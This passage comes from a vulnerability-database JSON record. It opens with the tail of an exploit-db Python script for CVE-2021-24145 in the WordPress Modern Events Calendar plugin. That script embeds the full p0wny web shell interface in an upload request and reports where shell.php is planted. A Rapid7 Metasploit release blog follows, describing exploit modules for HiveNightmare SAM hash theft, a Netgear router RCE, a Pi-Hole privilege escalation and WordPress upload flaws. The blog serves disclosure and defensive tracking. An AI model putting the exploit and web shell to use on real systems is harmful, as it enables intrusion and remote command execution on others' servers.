line-height: 30px;\\n }\\n\\n #shell-input #shell-cmd {\\n height: 30px;\\n line-height: 30px;\\n border: none;\\n background: transparent;\\n color: #eee;\\n font-family: monospace;\\n font-size: 10pt;\\n width: 100%;\\n align-self: center;\\n }\\n\\n #shell-input div {\\n flex-grow: 1;\\n align-items: stretch;\\n }\\n\\n #shell-input input {\\n outline: none;\\n }\\n </style>\\n\\n <script>\\n var CWD = null;\\n var commandHistory = [];\\n var historyPosition = 0;\\n var eShellCmdInput = null;\\n var eShellContent = null;\\n\\n function _insertCommand(command) {\\n eShellContent.innerHTML += \\\"\\\\n\\\\n\\\";\\n eShellContent.innerHTML += '<span class=\\\\\\\"shell-prompt\\\\\\\">' + genPrompt(CWD) + '</span> ';\\n eShellContent.innerHTML += escapeHtml(command);\\n eShellContent.innerHTML += \\\"\\\\n\\\";\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _insertStdout(stdout) {\\n eShellContent.innerHTML += escapeHtml(stdout);\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _defer(callback) {\\n setTimeout(callback, 0);\\n }\\n\\n function featureShell(command) {\\n\\n _insertCommand(command);\\n if (/^\\\\s*upload\\\\s+[^\\\\s]+\\\\s*$/.test(command)) {\\n featureUpload(command.match(/^\\\\s*upload\\\\s+([^\\\\s]+)\\\\s*$/)[1]);\\n } else if (/^\\\\s*clear\\\\s*$/.test(command)) {\\n // Backend shell TERM environment variable not set. 
Clear command history from UI but keep in buffer\\n eShellContent.innerHTML = '';\\n } else {\\n makeRequest(\\\"?feature=shell\\\", {cmd: command, cwd: CWD}, function (response) {\\n if (response.hasOwnProperty('file')) {\\n featureDownload(response.name, response.file)\\n } else {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n }\\n });\\n }\\n }\\n\\n function featureHint() {\\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\\n\\n function _requestCallback(data) {\\n if (data.files.length <= 1) return; // no completion\\n\\n if (data.files.length === 2) {\\n if (type === 'cmd') {\\n eShellCmdInput.value = data.files[0];\\n } else {\\n var currentValue = eShellCmdInput.value;\\n eShellCmdInput.value = currentValue.replace(/([^\\\\s]*)$/, data.files[0]);\\n }\\n } else {\\n _insertCommand(eShellCmdInput.value);\\n _insertStdout(data.files.join(\\\"\\\\n\\\"));\\n }\\n }\\n\\n var currentCmd = eShellCmdInput.value.split(\\\" \\\");\\n var type = (currentCmd.length === 1) ? \\\"cmd\\\" : \\\"file\\\";\\n var fileName = (type === \\\"cmd\\\") ? 
currentCmd[0] : currentCmd[currentCmd.length - 1];\\n\\n makeRequest(\\n \\\"?feature=hint\\\",\\n {\\n filename: fileName,\\n cwd: CWD,\\n type: type\\n },\\n _requestCallback\\n );\\n\\n }\\n\\n function featureDownload(name, file) {\\n var element = document.createElement('a');\\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\\n element.setAttribute('download', name);\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.click();\\n document.body.removeChild(element);\\n _insertStdout('Done.');\\n }\\n\\n function featureUpload(path) {\\n var element = document.createElement('input');\\n element.setAttribute('type', 'file');\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.addEventListener('change', function () {\\n var promise = getBase64(element.files[0]);\\n promise.then(function (file) {\\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n });\\n }, function () {\\n _insertStdout('An unknown client-side error occurred.');\\n });\\n });\\n element.click();\\n document.body.removeChild(element);\\n }\\n\\n function getBase64(file, onLoadCallback) {\\n return new Promise(function(resolve, reject) {\\n var reader = new FileReader();\\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\\n reader.onerror = reject;\\n reader.readAsDataURL(file);\\n });\\n }\\n\\n function genPrompt(cwd) {\\n cwd = cwd || \\\"~\\\";\\n var shortCwd = cwd;\\n if (cwd.split(\\\"/\\\").length > 3) {\\n var splittedCwd = cwd.split(\\\"/\\\");\\n shortCwd = \\\"\\xe2\\x80\\xa6/\\\" + splittedCwd[splittedCwd.length-2] + \\\"/\\\" + splittedCwd[splittedCwd.length-1];\\n }\\n return \\\"p0wny@shell:<span title=\\\\\\\"\\\" + cwd + \\\"\\\\\\\">\\\" + shortCwd + \\\"</span>#\\\";\\n }\\n\\n function updateCwd(cwd) {\\n if (cwd) {\\n CWD = 
cwd;\\n _updatePrompt();\\n return;\\n }\\n makeRequest(\\\"?feature=pwd\\\", {}, function(response) {\\n CWD = response.cwd;\\n _updatePrompt();\\n });\\n\\n }\\n\\n function escapeHtml(string) {\\n return string\\n .replace(/&/g, \\\"&\\\")\\n .replace(/</g, \\\"<\\\")\\n .replace(/>/g, \\\">\\\");\\n }\\n\\n function _updatePrompt() {\\n var eShellPrompt = document.getElementById(\\\"shell-prompt\\\");\\n eShellPrompt.innerHTML = genPrompt(CWD);\\n }\\n\\n function _onShellCmdKeyDown(event) {\\n switch (event.key) {\\n case \\\"Enter\\\":\\n featureShell(eShellCmdInput.value);\\n insertToHistory(eShellCmdInput.value);\\n eShellCmdInput.value = \\\"\\\";\\n break;\\n case \\\"ArrowUp\\\":\\n if (historyPosition > 0) {\\n historyPosition--;\\n eShellCmdInput.blur();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n _defer(function() {\\n eShellCmdInput.focus();\\n });\\n }\\n break;\\n case \\\"ArrowDown\\\":\\n if (historyPosition >= commandHistory.length) {\\n break;\\n }\\n historyPosition++;\\n if (historyPosition === commandHistory.length) {\\n eShellCmdInput.value = \\\"\\\";\\n } else {\\n eShellCmdInput.blur();\\n eShellCmdInput.focus();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n }\\n break;\\n case 'Tab':\\n event.preventDefault();\\n featureHint();\\n break;\\n }\\n }\\n\\n function insertToHistory(cmd) {\\n commandHistory.push(cmd);\\n historyPosition = commandHistory.length;\\n }\\n\\n function makeRequest(url, params, callback) {\\n function getQueryString() {\\n var a = [];\\n for (var key in params) {\\n if (params.hasOwnProperty(key)) {\\n a.push(encodeURIComponent(key) + \\\"=\\\" + encodeURIComponent(params[key]));\\n }\\n }\\n return a.join(\\\"&\\\");\\n }\\n var xhr = new XMLHttpRequest();\\n xhr.open(\\\"POST\\\", url, true);\\n xhr.setRequestHeader(\\\"Content-Type\\\", \\\"application/x-www-form-urlencoded\\\");\\n xhr.onreadystatechange = function() {\\n if (xhr.readyState === 4 && xhr.status === 200) {\\n 
try {\\n var responseJson = JSON.parse(xhr.responseText);\\n callback(responseJson);\\n } catch (error) {\\n alert(\\\"Error while parsing response: \\\" + error);\\n }\\n }\\n };\\n xhr.send(getQueryString());\\n }\\n\\n document.onclick = function(event) {\\n event = event || window.event;\\n var selection = window.getSelection();\\n var target = event.target || event.srcElement;\\n\\n if (target.tagName === \\\"SELECT\\\") {\\n return;\\n }\\n\\n if (!selection.toString()) {\\n eShellCmdInput.focus();\\n }\\n };\\n\\n window.onload = function() {\\n eShellCmdInput = document.getElementById(\\\"shell-cmd\\\");\\n eShellContent = document.getElementById(\\\"shell-content\\\");\\n updateCwd();\\n eShellCmdInput.focus();\\n };\\n </script>\\n </head>\\n\\n <body>\\n <div id=\\\"shell\\\">\\n <pre id=\\\"shell-content\\\">\\n <div id=\\\"shell-logo\\\">\\n ___ ____ _ _ _ _ _ <span></span>\\n _ __ / _ \\\\__ ___ __ _ _ / __ \\\\ ___| |__ ___| | |_ /\\\\/|| || |_ <span></span>\\n| '_ \\\\| | | \\\\ \\\\ /\\\\ / / '_ \\\\| | | |/ / _` / __| '_ \\\\ / _ \\\\ | (_)/\\\\/_ .. 
_|<span></span>\\n| |_) | |_| |\\\\ V V /| | | | |_| | | (_| \\\\__ \\\\ | | | __/ | |_ |_ _|<span></span>\\n| .__/ \\\\___/ \\\\_/\\\\_/ |_| |_|\\\\__, |\\\\ \\\\__,_|___/_| |_|\\\\___|_|_(_) |_||_| <span></span>\\n|_| |___/ \\\\____/ <span></span>\\n </div>\\n </pre>\\n <div id=\\\"shell-input\\\">\\n <label for=\\\"shell-cmd\\\" id=\\\"shell-prompt\\\" class=\\\"shell-prompt\\\">???</label>\\n <div>\\n <input id=\\\"shell-cmd\\\" name=\\\"cmd\\\" onkeydown=\\\"_onShellCmdKeyDown(event)\\\"/>\\n </div>\\n </div>\\n </div>\\n </body>\\n\\n</html>\\n\\r\\n-----------------------------29650037893637916779865254589\\r\\nContent-Disposition: form-data; name=\\\"mec-ix-action\\\"\\r\\n\\r\\nimport-start-bookings\\r\\n-----------------------------29650037893637916779865254589--\\r\\n\"\r\n\r\n# Exploit\r\nsession.post(exploit_url, headers=header, data=body)\r\nprint('')\r\nprint('[+] Shell Uploaded to: ' + 'http://' + target_ip + ':' + target_port + wp_path + '/wp-content/uploads/shell.php')\r\nprint('')", "sourceHref": "https://www.exploit-db.com/download/50082", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-07-30T19:00:15", "description": "## New Olympic Discipline: Hive Hunting\n\n\n\nThis week, community contributor [Hakyac](<https://github.com/Hakyac>) added a new Olympic discipline to Metasploit exploit sport category, which is based on the work of community security researchers [@jonasLyk](<https://twitter.com/jonasLyk/status/1417205166172950531>) and [Kevin Beaumont](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>)). The rules are simple: You need to abuse a flaw in Windows 10 and 11 configuration to pass through the defense and access Security Account Manager (SAM) files. Any local unprivileged player is able to read this sensitive security information, such as hashes of user/admin passwords. 
The best strategy to win a gold medal is to start abusing Windows Volume Shadow Copy Service (VSS) to access these files and copy them locally. Finally, you just need to dump the NTLM hashes, use them in a pass-the-hash attack and score with a remote code execution.\n\nNote that Microsoft issued an out-of-band [advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>) and tracked this vulnerability as [CVE-2021-36934](<https://attackerkb.com/topics/DOrZUykRSX/cve-2021-36934-windows-elevation-of-privilege?referrer=blog>). You can find more information about the rules in this blog [post](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>). Happy Hive hunting!\n\n## Gold Medal for NetGear R7000 in Swimming 100m Heap Overflow\n\nOur own [Grant Willcox](<https://github.com/gwillcox-r7>) added a new exploit module that won the Swimming 100m Heap Overflow discipline. It took advantage of a flaw in the `genie.cgi?backup.cgi` page of Netgear R7000 routers to enable a telnet server and easily got code execution as the `root` user. Note that, whereas firmware versions `1.0.11.116` and prior are vulnerable, this module can only be used with version `1.0.11.116` at the moment. The `check` method can still be used to detect whether older devices are vulnerable. This module is based on research done by [@colorlight2019](<https://twitter.com/colorlight2019>). A new gold medal for the Metasploit team, great job!\n\n## New module content (5)\n\n * [Netgear R7000 backup.cgi Heap Overflow RCE](<https://github.com/rapid7/metasploit-framework/pull/15163>) by [Grant Willcox](<https://github.com/gwillcox-r7>), SSD Disclosure, and colorlight2019, which exploits [CVE-2021-31802](<https://attackerkb.com/topics/KwzVhOiykj/cve-2021-31802?referrer=blog>) \\- This adds a module that leverages CVE-2021-31802, an unauthenticated RCE in Netgear R7000 routers. 
The vulnerability is leveraged to execute a shellcode stub that will enable telnet which can then be accessed for root privileges on the affected device.\n * [Pi-Hole Remove Commands Linux Priv Esc](<https://github.com/rapid7/metasploit-framework/pull/15279>) by [Emanuele Barbeno](<https://ch.linkedin.com/in/emanuele-barbeno-b53a4990>) and [h00die](<https://github.com/h00die>), which exploits [CVE-2021-29449](<https://attackerkb.com/topics/0HUT2niFGw/cve-2021-29449?referrer=blog>) \\- This adds a local privilege escalation module that targets Pi-Hole versions >= `3.0` and <= `5.2.4`. In vulnerable versions of the software, a user with `sudo` privileges can escalate to `root` by passing shell commands to either the `removecustomcname`, `removecustomdns`, or `removestaticdhcp` function. The functions have minimal sanitization, and they pass the input to the `sed` command. By default, the `www-data` user is permitted to run `sudo` without supplying a password as configured in the `sudoers.d/pihole` file.\n * [Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/15418>) by Nguyen Van Khanh, [Ron Jost](<https://github.com/Hacker5preme>), and [Yann Castel](<https://github.com/Hakyac>), which exploits [CVE-2021-24145](<https://attackerkb.com/topics/TWCON6tk7O/cve-2021-24145?referrer=blog>) \\- This adds a module that exploits an authenticated file upload vulnerability in the Wordpress plugin known as Modern Events Calendar. For versions before `5.16.5`, an administrative user can upload a php payload via the calendar import feature by setting the content type of the file to `text/csv`. 
Code execution with the privileges of the user running the server is achieved by sending a request for the uploaded file.\n * [Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/15408>) by [Ron Jost](<https://github.com/Hacker5preme>) and [Yann Castel](<https://github.com/Hakyac>), which exploits [CVE-2021-24347](<https://attackerkb.com/topics/gechd9yh12/cve-2021-24347?referrer=blog>) \\- This adds a module that exploits an authenticated file upload vulnerability in the Wordpress plugin, SP Project and Document Manager. For versions below `4.22`, an authenticated user can upload arbitrary PHP code because the security check only blocks the upload of files with a `.php` extension, meaning that uploading a file with a `.pHp` extension is allowed. Once uploaded, requesting the file will result in code execution as the `www-data` user.\n * [Windows SAM secrets leak - HiveNightmare](<https://github.com/rapid7/metasploit-framework/pull/15462>) by [Kevin Beaumont](<https://twitter.com/GossiTheDog>), [Yann Castel](<https://github.com/Hakyac>), and [romarroca](<https://github.com/romarroca>), which exploits [CVE-2021-36934](<https://attackerkb.com/topics/DOrZUykRSX/cve-2021-36934-windows-elevation-of-privilege?referrer=blog>) \\- This adds a new exploit module that exploits a configuration issue in Windows 10 (from version 1809) and 11, identified as CVE-2021-36934. Due to permission issues, any local user is able to read SAM and SYSTEM hives. 
This module abuses Windows Volume Shadow Copy Service (VSS) to access these files and save them locally.\n\n## Enhancements and features\n\n * [#15444](<https://github.com/rapid7/metasploit-framework/pull/15444>) from [pingport80](<https://github.com/pingport80>) \\- This adds additional support for PowerShell sessions to some methods in the File mixin leveraged by post modules.\n * [#15465](<https://github.com/rapid7/metasploit-framework/pull/15465>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- Updates the local exploit suggester to gracefully handle modules raising unintended exceptions and nil target information.\n\n## Bugs fixed\n\n * [#15359](<https://github.com/rapid7/metasploit-framework/pull/15359>) from [stephenbradshaw](<https://github.com/stephenbradshaw>) \\- Fixes a bug in the `ssh_login_pubkey` module, which would crash out when not connected to the database.\n * [#15460](<https://github.com/rapid7/metasploit-framework/pull/15460>) from [pingport80](<https://github.com/pingport80>) \\- This fixes a localization-related issue in the File library's `copy_file` method, caused by it searching for a word in the output to determine success.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.54...6.0.55](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-07-22T11%3A58%3A03-05%3A00..2021-07-29T12%3A01%3A27-05%3A00%22>)\n * [Full diff 6.0.54...6.0.55](<https://github.com/rapid7/metasploit-framework/compare/6.0.54...6.0.55>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-30T18:04:33", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24145", "CVE-2021-24347", "CVE-2021-29449", "CVE-2021-31802", "CVE-2021-36934"], "modified": "2021-07-30T18:04:33", "id": "RAPID7BLOG:BC95AC0129EFB4BE8FD9B532251948ED", "href": "https://blog.rapid7.com/2021/07/30/metasploit-wrap-up-123/", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}]}